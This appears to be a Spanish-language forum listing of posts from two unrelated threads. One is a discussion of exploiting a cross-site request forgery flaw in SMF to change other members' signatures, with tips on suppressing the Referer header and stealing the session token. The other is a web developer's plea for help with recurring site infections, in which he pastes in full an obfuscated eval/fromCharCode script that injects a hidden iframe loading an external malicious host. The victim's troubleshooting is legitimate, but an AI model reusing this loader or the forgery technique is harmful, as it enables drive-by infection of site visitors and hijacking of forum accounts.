Mensajes

Obtener el sc es lo más complicado para mi, primero pensé e un iframe... pero rápidamente lo descarté porque no se mantendría la cookie y sería un lio.
Hay que obtenerlo como Yoya, con la imagen. Pero todavía no entiendo de dónde sale si al cargar la "imagen" no se envía de ninguna forma. 

Un saludo!!

Exacto,

tiene que ser algo de esto:

Código [Seleccionar] Expandir

http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html

En Firefox, se puede no enviar el referer si nos vamos a la barra de direcciones y ponenos about:config

Entonces buscamos "referer" con CTRL+F que tendrá normalmente un valor 2, y lo ponemos a 0 y ya nos dejará enviar el formuario desde un servidor externo.

Falta solo robar el SC.

network.http.sendRefererHeader;0

De hecho en mi firma se ven intentos del cambio de firma

SMF no verifica que el referer sea correcto, si le dan un vistazo al código fuente verán que solo verifica que el referer no sea un enlace externo solamente, eso quiere decir que..... [censurado]

Que pasa al utilizar https://www.google.cl/ ? han visto live headers cuando hacen busquedas desde google?

Con esas dos pistas les estoy regalando el bug.

Ya que lo has dicho tú WHK,  a mi me extraña mucho que YoYa no lo consiga, si ya tiene el SC que es yo creo lo más difícil y lo que a mi me falta.

Yo he probado el formulario aislado que está en una página de este de este mismo hilo por otro usuario, estando conectado yo  al foro me cambia la firma.

Por lo que enviado un enlace a WHK o poniéndolo como avatar como ha hecho YoYa, con eso debería cambiar la firma.

Eso sí, si pongo la página con el formulario -dentro- de un servidor local o externo no funciona (envía referer y SMF lo detecta), pero si la pongo por ejemplo con un HTML simple, digamos en el escritorio entonces cambia la firma.

Creo que eso es lo que quieres decir.

Con esto al menos YoYa debería tener suficiente.

Buenas de nuevo,

Como dice .:UND3R:. en problema está en mi ordenador, sin duda. Explico:

Tengo un cliente que no está en el Filezilla. Ayer se infectaron otros que no estaban infectados y ese cliente no. Por lo tanto:

1. 100% seguro tiene que ver con el Filezilla y las contraseñas en texto plano.
2. Pasé un escaneo completo del avast, y encontró un bicho en la carpeta system-volumen-information. Lo eliminé sin verificar que era (fallo).

3. Con el process monitor, veo una cosa rara:

Cuando abro filezilla, unos  segundos después se abre el svchost.exe



Uploaded with ImageShack.us

En sucesivas pruebas, si abro y cierro  rápido el Filezilla el svchost.exe no se lanza.

El svchost es un servicio legítimo de Windows, y se arranca con la ruta legítima (c:\windows\system32\svchost.exe.

El svchost en algo así como un lanzador de procesos, y ese PID en concreto, lanza esto:

C:\WINDOWS\system32\svchost.exe -k netsvcs

Ahí continúo investigando en Google, pero la información es imprecisa, hay páginas que dicen que es un virus, hay otras que dicen que es un servicio legítimo, etc.

La cuestión es que, en la carpeta c:\windows\system32\ no está tal fichero.

¿puede estar troyanizado el propio svchost, o el filezilla.exe?

¡Si señor, lo estamos pillando!, casi seguro que es el filezilla.

He ido a:
C:\Documents and Settings\MIUSUARIO\Datos de programa\FileZilla y hay dos ficheros que contienen contraseñas en texto plano, como bien dice Novlucker.

Un fichero es filezilla.xml, que curiosamente tiene ahora mismo SOLO las contreseñas de los dos alojamiento infectados hoy, porque lo usé antes para eliminarlo, y el otro es sitemanager.xml, que ese sí contiene las contraseñas de todos mis sitios.

Os explico, el virus es clicico, afecto a 18 clientes en la primera vuelta, y hoy a comenzado la segunda, ayer infectó un sitio, y hoy 3. Está infectando ahora mismo.

¿Como podría pillarlo?
--------------------------
Se me ocurre tres formas:

1. Con un programa que vigile cuando un programa accede a un fichero. O sea, un filemonitor pero al revés.

2: cojo el fichero sitemanager.xml y lleno el campo <pass></pass> de A'es, a ver si provoca un overflow (con suerte está mal programado), y salta la ventana de windows, etc

3. eliminio el fichero sitemanager.xml, con suerte se cuelga el bicho.

Me imagino que no tienen una copia local, porque como digo es cíclico, supongo que revisa todo cada x tiempo por si hay un sitio nuevo.

¿sabéis algún programa que haga el punto 1 para Windows XP?
¿alguna otra solución?

Repito, el virus está infectando por ahí ahora mismo.

Saludos.

Una pista, ahora que me doy cuenta, que ha pasado en todos los clientes:

- No se añade a la base de datos, sino que sobreescribe el fichero a las páginas web, después antes fin de cierre del body


<SCRIPT DEL VIRUS>
</SCRIPT>
</body>
</html>

Curiosamente siempre ataca a los mismos ficheros en cada aplicacióin
Los permisos de las carpetas y subcarpetas son: 755 y los de ficheros 644

Por lo que solo admin o el dueño puede cambiarlo.

Todo comprobado, no hay ficheros ni carpetas con otros permisos de lectura.

Eso me hace descartar cualquier virus a nivel de aplicación. El dueño y grupo de los ficheros está correcto.

¿No parece esto más relacionado con mi cliente de FTP? Uso filezilla, pero una cosa rara es que el DreamWeaver me está fallando como nunca, se bloquea cosa que nunca hacia antes.

Pienso que algo puede haber robado los ficheros con los perfiles en Filezilla o DreamWeaver.

Hace poco quite un virus extraño, pero en descripción en internet no ponía ningún efecto de este tipo.

Por si esto puede ayudar.

Saludos.

Gracias por moverlo.

No uso VPS, y lo raro es que son 3 servidores distintos, unos están en CDMON, otros en Stratos y otros en 1and1, vamos tres proveedores diferentes. Son todos hosting compartido, no tengo acceso a la shell.

Es que no tengo ni idea.

Gracias de nuevo, y cualquier sugerencia bienvenida.

Tampoco tengo acceso a los logs. Uno puede que se me haya metido a través de un chat online ahora que recuerdo, pero el resto no tiene ese chat online, y como digo, son servidores diferentes, que para nada están relacionados.

Pongo el virus completo, pensaba que no me iba a dejar:

Código [Seleccionar] Expandir

<script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script>

<script>var s,o=Math.atan(Math.tan(2));o*=2;o=Math.ceil(o);aa=document.createTextNode("ev"+"al");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,110+o,106+o,104+o,114+o,121+o,104+o,109+o,110+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,50+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,110+o,106+o,104+o,114+o,121+o,104+o,109+o,110+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,50+o,48+o,114+o,106+o,114+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script>


Infecta diferentes ficheros, donde le da la gana.

Buenos días soy Programador Web.

No sé como pero se ha metido un virus en casi todas las páginas webs de mis clientes.

La cuestión es que no veo un punto de entrada común salvo mi ordenador, me explico:

1. - Se ha introducido en tres aplicaciones diferentes: Joomla, Prestashop, y un CMS Propio.

Por eso "creo" que descarto cualquier tipo de bug de las aplicaciones, ya que es siempre el mismo virus en los tres tipo de aplicaciones, y no puede haber el mismo tipo de fallo.

2. ¿Puede ser fallo del servidor?, porque los tres tienen Apaches con con versiones diferentes. A no ser, que haya un fallo común no detectado en Apache o PHP, o algo que ignore.

Os dejo cabeceras de varios servidores afectados, en diferentes hosting (1and1, CDMON, stratos):


TTP/1.1 200 OK
Date: Fri, 05 Aug 2011 09:09:55 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1

HTTP/1.1 200 OK
Date: Fri, 05 Aug 2011 09:10:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Type: text/html

HTTP/1.1 200 OK
Date: Fri, 05 Aug 2011 09:10:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Type: text/html


3. Puede ser mi ordenador, según el Avast está límpio, y no tengo conexiones abiertas por netstat.exe (uso Windows).

No sé muy bien que puede ser,

Cualquier ayuda es bienvenida. Elimino el virus, y cada X tiempo vuelve a aparecer. Me está causando muchos problemas. No encuentro nada en Google, etc.

Dejo un extracto del virus, si lo necesitáis completo me decís por favor, donde subirlo:


<script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o... Resto de virus...